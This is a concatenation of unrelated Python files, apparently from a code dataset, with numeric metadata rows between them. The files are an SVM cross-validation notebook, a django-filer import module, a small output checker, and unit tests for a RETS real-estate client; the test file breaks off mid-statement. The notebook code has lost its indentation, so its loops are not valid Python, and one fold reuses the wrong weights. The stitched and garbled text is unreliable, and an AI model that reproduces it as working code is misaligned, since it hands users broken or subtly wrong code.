w2 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)], w2)
p7+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p7+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)], w3)
p7+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p7+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p7/6)
start4 = timer()
w = weights((cvx_fiting(1.0,text_x_2,text_t_2,compute_K('poly',text_x_2,1.0,5))),text_x_2,text_t_2)
b = text_t_2[((cvx_fiting(1.0,text_x_2,text_t_2,compute_K('poly',text_x_2,1.0,5))) > 1e-9).reshape(-1)] - np.dot(text_x_2[((cvx_fiting(1.0,text_x_2,text_t_2,compute_K('poly',text_x_2,1.0,5))) > 1e-9).reshape(-1)], w)
print('Training score',get_scores(text_x_2,text_t_2,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,5))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,5))) > 1e-9).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.0,5))) > 1e-9).reshape(-1)], w1)
p5 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p5+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,5))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,5))) > 1e-9).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.0,5))) > 1e-9).reshape(-1)], w2)
p5+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p5+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,5))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,5))) > 1e-9).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.0,5))) > 1e-9).reshape(-1)], w3)
p5+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p5+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p5/6)
end4 = timer()
print('TIME',end4 - start4)
# In[35]:
# FOR CLASSES {4,5}
#training data
text_x_3 = dp[1232:1800,:25]
text_t_3 = dp[1232:1800,25].astype('int')
for i in range(text_t_3.shape[0]):
if (text_t_3[i] == 4) :
text_t_3[i] = 1
else :
text_t_3[i] = -1
#testing data
tp_x_1 = np.append(dp[1232:1332,:25],dp[1533:1610,:25],axis=0)
tp_t_1 = np.append(dp[1232:1332,25],dp[1533:1610,25],axis=0)
tp_t_1 = tp_t_1.astype('int')
for i in range(tp_t_1.shape[0]):
if (tp_t_1[i] == 4) :
tp_t_1[i] = 1
else :
tp_t_1[i] = -1
tp_x_2 = np.append(dp[1333:1433,:25],dp[1610:1699,:25],axis=0)
tp_t_2 = np.append(dp[1333:1433,25],dp[1610:1699,25],axis=0)
tp_t_2 = tp_t_2.astype('int')
for i in range(tp_t_2.shape[0]):
if (tp_t_2[i] == 4) :
tp_t_2[i] = 1
else :
tp_t_2[i] = -1
tp_x_3 = np.append(dp[1433:1532,:25],dp[1700:1800,:25],axis=0)
tp_t_3 = np.append(dp[1433:1532,25],dp[1700:1800,25],axis=0)
tp_t_3 = tp_t_3.astype('int')
for i in range(tp_t_3.shape[0]):
if (tp_t_3[i] == 4) :
tp_t_3[i] = 1
else :
tp_t_3[i] = -1
support_vectors = np.where(cvx_fiting(1.29,text_x_3,(text_t_3),compute_K('linear',text_x_3,0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.29,text_x_3,(text_t_3),compute_K('rbf',text_x_3,1.0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.0,text_x_3,(text_t_3),compute_K('poly',text_x_3,1.29,1)) > 1e-4)[0]
print(support_vectors)
start7 = timer()
w = weights((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('linear',text_x_3,0,0))),text_x_3,text_t_3)
b = text_t_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('linear',text_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('linear',text_x_3,0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x_3,text_t_3,w,b[0]))
w1 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)], w1)
p5 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p5+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)], w2)
p5+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p5+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)], w3)
p5+= get_scores(tp_x_1,tp_t_1,w,b[0])
p5+= get_scores(tp_x_3,tp_t_3,w,b[0])
print('Cross_validation score',p5/6)
end7 = timer()
print('TIME',end7 - start7)
w4 = weights((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('rbf',text_x_3,1.0,0))),text_x_3,text_t_3)
b4 = text_t_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('rbf',text_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(text_x_3[((cvx_fiting(1.29,text_x_3,text_t_3,compute_K('rbf',text_x_3,1.0,0))) > 1e-4).reshape(-1)], w4)
print('Training score',get_scores(text_x_3,text_t_3,w4,b4[0]))
w5 = weights((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))),tp_x_1,tp_t_1)
b5 = tp_t_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.29,tp_x_1,tp_t_1,compute_K('rbf',tp_x_1,1.0,0))) > 1e-4).reshape(-1)], w5)
p5 = get_scores(tp_x_2,tp_t_2,w5,b5[0])
p5+=get_scores(tp_x_3,tp_t_3,w5,b5[0])
w6 = weights((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))),tp_x_3,tp_t_3)
b6 = tp_t_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.29,tp_x_3,tp_t_3,compute_K('rbf',tp_x_3,1.0,0))) > 1e-4).reshape(-1)], w6)
p5+=get_scores(tp_x_2,tp_t_2,w6,b6[0])
p5+= get_scores(tp_x_1,tp_t_1,w6,b6[0])
w7 = weights((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))),tp_x_2,tp_t_2)
b7 = tp_t_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.29,tp_x_2,tp_t_2,compute_K('rbf',tp_x_2,1.0,0))) > 1e-4).reshape(-1)], w7)
p5+= get_scores(tp_x_1,tp_t_1,w7,b7[0])
p5+= get_scores(tp_x_3,tp_t_3,w7,b7[0])
print('Cross_validation score',p5/6)
start6 = timer()
w = weights((cvx_fiting(1.0,text_x_3,text_t_3,compute_K('poly',text_x_3,1.29,1))),text_x_3,text_t_3)
b = text_t_3[((cvx_fiting(1.0,text_x_3,text_t_3,compute_K('poly',text_x_3,1.29,1))) > 1e-9).reshape(-1)] - np.dot(text_x_3[((cvx_fiting(1.0,text_x_3,text_t_3,compute_K('poly',text_x_3,1.29,1))) > 1e-9).reshape(-1)], w)
print('Training score',get_scores(text_x_3,text_t_3,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.29,1))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.29,1))) > 1e-9).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('poly',tp_x_1,1.29,1))) > 1e-9).reshape(-1)], w1)
p6 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p6+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.29,1))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.29,1))) > 1e-9).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('poly',tp_x_3,1.29,1))) > 1e-9).reshape(-1)], w2)
p6+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p6+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.29,1))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.29,1))) > 1e-9).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('poly',tp_x_2,1.29,1))) > 1e-9).reshape(-1)], w3)
p6+= get_scores(tp_x_1,tp_t_1,w3,b3[0])
p6+= get_scores(tp_x_3,tp_t_3,w3,b3[0])
print('Cross_validation score',p6/6)
end6 = timer()
print('TIME',end6 - start6)
# In[ ]:
| 50.181818 | 218 | 0.664569 | 5,125 | 20,976 | 2.388293 | 0.042146 | 0.068382 | 0.084967 | 0.023693 | 0.866503 | 0.850409 | 0.85 | 0.843791 | 0.841422 | 0.824101 | 0 | 0.12502 | 0.106169 | 20,976 | 417 | 219 | 50.302158 | 0.527815 | 0.014636 | 0 | 0.267267 | 0 | 0 | 0.04519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012012 | false | 0 | 0.03003 | 0 | 0.054054 | 0.099099 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
383ac1709cddad19258776defb52da6abd7f3ad6 | 305 | py | Python | filer/models/__init__.py | mkoistinen/django-filer | 8f2e81bc5a14638cb2092186d7dc54f6551d8ae5 | ["BSD-3-Clause"] | null | null | null | filer/models/__init__.py | mkoistinen/django-filer | 8f2e81bc5a14638cb2092186d7dc54f6551d8ae5 | ["BSD-3-Clause"] | null | null | null | filer/models/__init__.py | mkoistinen/django-filer | 8f2e81bc5a14638cb2092186d7dc54f6551d8ae5 | ["BSD-3-Clause"] | null | null | null |
# -*- coding: utf-8 -*-
from filer.models.clipboardmodels import * # flake8: noqa
from filer.models.filemodels import * # flake8: noqa
from filer.models.foldermodels import * # flake8: noqa
from filer.models.imagemodels import * # flake8: noqa
from filer.models.virtualitems import * # flake8: noqa
| 38.125
| 58
| 0.737705
| 38
| 305
| 5.921053
| 0.368421
| 0.2
| 0.333333
| 0.355556
| 0.551111
| 0.551111
| 0
| 0
| 0
| 0
| 0
| 0.023166
| 0.15082
| 305
| 7
| 59
| 43.571429
| 0.84556
| 0.281967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
383dc6d773e542c1e4108b6590f95fa3c1fcf9fc
| 60
|
py
|
Python
|
Codeforces/317 Division 1/Problem B/check.py
|
VastoLorde95/Competitive-Programming
|
6c990656178fb0cd33354cbe5508164207012f24
|
[
"MIT"
] | 170
|
2017-07-25T14:47:29.000Z
|
2022-01-26T19:16:31.000Z
|
Codeforces/317 Division 1/Problem B/check.py
|
navodit15/Competitive-Programming
|
6c990656178fb0cd33354cbe5508164207012f24
|
[
"MIT"
] | null | null | null |
Codeforces/317 Division 1/Problem B/check.py
|
navodit15/Competitive-Programming
|
6c990656178fb0cd33354cbe5508164207012f24
|
[
"MIT"
] | 55
|
2017-07-28T06:17:33.000Z
|
2021-10-31T03:06:22.000Z
|
with open('1.out') as f1, open('2.out') as f2:
    print(f1.read() == f2.read())
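# A hedged variant (not in the original checker): byte-for-byte comparison fails
# on trailing-newline or spacing differences, so a tolerant judge can compare
# whitespace-split token streams instead. File names follow the '1.out'/'2.out'
# convention used above.
def outputs_match(path_a, path_b):
    """Compare two output files token by token, ignoring whitespace layout."""
    with open(path_a) as fa, open(path_b) as fb:
        return fa.read().split() == fb.read().split()

print(outputs_match('1.out', '2.out'))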
| 30
| 59
| 0.516667
| 11
| 60
| 2.818182
| 0.636364
| 0.258065
| 0.516129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036364
| 0.083333
| 60
| 1
| 60
| 60
| 0.527273
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
6988f4d631a6cc272417a92144711a6b037abf3d
| 19,638
|
py
|
Python
|
tests/test_session.py
|
bazeli/rets
|
3498de3e242b31faf39403061da1aea28b5b9a04
|
[
"MIT"
] | null | null | null |
tests/test_session.py
|
bazeli/rets
|
3498de3e242b31faf39403061da1aea28b5b9a04
|
[
"MIT"
] | null | null | null |
tests/test_session.py
|
bazeli/rets
|
3498de3e242b31faf39403061da1aea28b5b9a04
|
[
"MIT"
] | null | null | null |
import unittest
import responses
from rets.exceptions import RETSException
from rets.session import Session
class SessionTester(unittest.TestCase):
def setUp(self):
super(SessionTester, self).setUp()
with open('tests/rets_responses/Login.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200, headers={'Set-Cookie': 'ASP.NET_SessionId=zacqcc1gjhkmazjznjmyrinq;'})
self.session = Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser',
version='RETS/1.7.2', session_id_cookie_name='ASP.NET_SessionId')
self.session.login()
def test_system_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_system.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
sys_metadata = self.session.get_system_metadata()
self.assertEqual(sys_metadata['version'], '1.11.76001')
self.assertEqual(sys_metadata['system_id'], 'MLS-RETS')
def test_logout(self):
with open('tests/rets_responses/Logout.html') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Logout.ashx',
body=contents, status=200)
self.assertTrue(self.session.logout())
def test_resource_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_resources.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource = self.session.get_resource_metadata()
self.assertEqual(len(resource), 6)
def test_get_object(self):
with open('tests/rets_responses/GetObject.byte', 'rb') as f:
single = f.read()
with open('tests/rets_responses/GetObject_multipart.byte', 'rb') as f:
multiple = f.read()
multi_headers = {
'Content-Type': 'multipart/parallel; boundary="24cbd0e0afd2589bb9dcb1f34cf19862"; charset=utf-8',
'Connection': 'keep-alive', 'RETS-Version': 'RETS/1.7.2', 'MIME-Version': '1.0, 1.0'
}
single_headers = {'MIME-Version': '1.0, 1.0', 'Object-ID': '0', 'Content-ID': '2144466',
'Content-Type': 'image/jpeg', 'Connection': 'keep-alive',
'RETS-Version': 'RETS/1.7.2'}
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=single, status=200, headers=single_headers)
objs = self.session.get_object(resource='Property', object_type='Photo', content_ids='1', object_ids='1')
self.assertEqual(len(objs), 1)
self.assertEqual(objs[0]['content_md5'], '396106a133a23e10f6926a82d219edbc')
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200, headers=multi_headers)
objs1 = self.session.get_object(resource='Property', object_type='Photo', content_ids='1')
self.assertEqual(len(objs1), 9)
def test_get_object_location1(self):
with open('tests/rets_responses/GetObject_multipart_Location1.byte', 'rb') as f:
multiple = f.read()
multi_headers = {
'Content-Type': 'multipart/parallel; '
'boundary="FLEXLIAsmcpmiKpZ3uhewHnpQUlQNYzuNzPeUi0PIqCAxzgSRkpypX"; '
'charset=utf-8',
'Connection': 'keep-alive', 'RETS-Version': 'RETS/1.7.2', 'MIME-Version': '1.0, 1.0'}
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200, headers=multi_headers)
objs1 = self.session.get_object(resource='Property', object_type='Photo', content_ids='1', location='1')
self.assertEqual(len(objs1), 41)
def test_preferred_object(self):
with open('tests/rets_responses/GetObject_multipart.byte', 'rb') as f:
multiple = f.read()
multi_headers = {
'Content-Type': 'multipart/parallel; boundary="24cbd0e0afd2589bb9dcb1f34cf19862"; charset=utf-8',
'Connection': 'keep-alive', 'RETS-Version': 'RETS/1.7.2', 'MIME-Version': '1.0, 1.0'}
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200, headers=multi_headers)
obj = self.session.get_preferred_object(resource='Property', object_type='Photo', content_id=1)
self.assertTrue(obj)
resps.add(resps.POST, 'http://server.rets.com/rets/GetObject.ashx',
body=multiple, status=200)
resource = dict()
resource['ResourceID'] = 'Agent'
obj1 = self.session.get_preferred_object(resource=resource, object_type='Photo', content_id=1)
self.assertTrue(obj1)
def test_class_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_classes.xml') as f:
contents = ''.join(f.readlines())
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_classes_single.xml') as f:
single_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource_classes = self.session.get_class_metadata(resource='Agent')
self.assertEqual(len(resource_classes), 6)
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=single_contents, status=200)
resource_classes_single = self.session.get_class_metadata(resource='Property')
self.assertEqual(len(resource_classes_single), 1)
def test_search(self):
with open('tests/rets_responses/COMPACT-DECODED/Search.xml') as f:
search_contents = ''.join(f.readlines())
with open('tests/rets_responses/Errors/Error_InvalidFormat.xml') as f:
invalid_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search_contents, status=200, stream=True)
results = self.session.search(resource='Property',
resource_class='RES',
search_filter={'ListingPrice': 200000})
self.assertEqual(len(results), 3)
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search_contents, status=200, stream=True)
results1 = self.session.search(resource='Property',
resource_class='RES',
limit=3,
dmql_query='ListingPrice=200000',
optional_parameters={'RestrictedIndicator': '!!!!'})
self.assertEqual(len(results1), 3)
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=invalid_contents, status=200, stream=True)
with self.assertRaises(RETSException):
r = self.session.search(resource='Property',
resource_class='RES',
dmql_query='ListingPrice=200000',
optional_parameters={'Format': "Somecrazyformat"})
print(r)
def test_auto_offset(self):
with open('tests/rets_responses/COMPACT-DECODED/Search_1of2.xml') as f:
search1_contents = ''.join(f.readlines())
with open('tests/rets_responses/COMPACT-DECODED/Search_2of2.xml') as f:
search2_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search1_contents, status=200, stream=True)
resps.add(resps.POST, 'http://server.rets.com/rets/Search.ashx',
body=search2_contents, status=200, stream=True)
results = self.session.search(resource='Property',
resource_class='RES',
search_filter={'ListingPrice': 200000})
self.assertEqual(len(results), 6)
def test_cache_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_table.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
self.session.get_table_metadata(resource='Property', resource_class='RES')
self.assertIn('METADATA-TABLE:Property:RES', list(self.session.metadata_responses.keys()))
# Subsequent call without RequestsMock should fail unless we get the saved response from metadata_responses
table = self.session.get_table_metadata(resource='Property', resource_class='RES')
self.assertEqual(len(table), 208)
def test_table_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_table.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
table = self.session.get_table_metadata(resource='Property', resource_class='RES')
self.assertEqual(len(table), 208)
def test_lookup_type_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_lookup.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
lookup_values = self.session.get_lookup_values(resource='Agent', lookup_name='Broker')
self.assertEqual(len(lookup_values), 61)
def test_object_metadata(self):
with open('tests/rets_responses/COMPACT-DECODED/GetMetadata_objects.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
object_metadata = self.session.get_object_metadata(resource='Agent')
self.assertEqual(len(object_metadata), 3)
def test_agent_digest_hash(self):
self.session.user_agent_password = "testing"
self.assertIsNotNone(self.session._user_agent_digest_hash())
def test_session_cookie_name(self):
self.assertEqual(self.session.session_id, 'zacqcc1gjhkmazjznjmyrinq')
def test_change_parser_automatically(self):
self.assertEqual(self.session.metadata_format, 'COMPACT-DECODED')
with open('tests/rets_responses/Errors/20514.xml') as f:
dtd_error = ''.join(f.readlines())
with open('tests/rets_responses/STANDARD-XML/GetMetadata_system.xml') as f:
content = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=dtd_error, status=200)
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=content, status=200)
self.session.get_system_metadata()
self.assertEqual(self.session.metadata_format, 'STANDARD-XML')
class Session15Tester(unittest.TestCase):
def setUp(self):
super(Session15Tester, self).setUp()
with open('tests/rets_responses/Login.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200)
self.session = Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser',
version='1.5')
self.session.metadata_format = 'STANDARD-XML'
self.session.login()
def test_system_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_system.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
sys_metadata = self.session.get_system_metadata()
self.assertEqual(sys_metadata['version'], '45.61.69081')
self.assertEqual(sys_metadata['system_id'], 'RETS')
def test_resource_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_resources.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource = self.session.get_resource_metadata()
self.assertEqual(len(resource), 2)
def test_class_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_classes.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
resource_classes = self.session.get_class_metadata(resource='Agent')
self.assertEqual(len(resource_classes), 8)
def test_table_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_table.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
table = self.session.get_table_metadata(resource='Property', resource_class='1')
self.assertEqual(len(table), 162)
def test_lookup_type_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_lookup.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
lookup_values = self.session.get_lookup_values(resource='Property', lookup_name='1_2')
self.assertEqual(len(lookup_values), 9)
def test_object_metadata(self):
with open('tests/rets_responses/STANDARD-XML/GetMetadata_objects.xml') as f:
contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/GetMetadata.ashx',
body=contents, status=200)
object_metadata = self.session.get_object_metadata(resource='Agent')
self.assertEqual(len(object_metadata), 1)
class LoginTester(unittest.TestCase):
def test_login(self):
expected_capabilities1 = {
u'GetMetadata': u'http://server.rets.com/rets/GetMetadata.ashx',
u'GetObject': u'http://server.rets.com/rets/GetObject.ashx',
u'Login': u'http://server.rets.com/rets/Login.ashx',
u'Logout': u'http://server.rets.com/rets/Logout.ashx',
u'PostObject': u'http://server.rets.com/rets/PostObject.ashx',
u'Search': u'http://server.rets.com/rets/Search.ashx',
u'Update': u'http://server.rets.com/rets/Update.ashx'
}
expected_capabilities2 = {
u'GetMetadata': u'http://server.rets.com/rets/GetMetadata.ashx',
u'GetObject': u'http://server.rets.com/rets/GetObject.ashx',
u'Login': u'http://server.rets.com/rets/Login.ashx',
u'Logout': u'http://server.rets.com/rets/Logout.ashx',
u'Search': u'http://server.rets.com/rets/Search.ashx',
}
with open('tests/rets_responses/Login.xml') as f:
contents = ''.join(f.readlines())
with open('tests/rets_responses/Logout.html') as f:
logout_contents = ''.join(f.readlines())
with open('tests/rets_responses/Errors/Login_no_host.xml') as f:
no_host_contents = ''.join(f.readlines())
with responses.RequestsMock() as resps:
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200)
s = Session(login_url='http://server.rets.com/rets/Login.ashx', username='retsuser', version='1.5')
s.login()
self.assertEqual(s.capabilities, expected_capabilities1)
self.assertEqual(s.version, '1.5')
resps.add(resps.POST, 'http://server.rets.com/rets/Login.ashx',
body=contents, status=200)
resps.add(resps.POST, 'http://server.rets.com/rets/Logout.ashx',
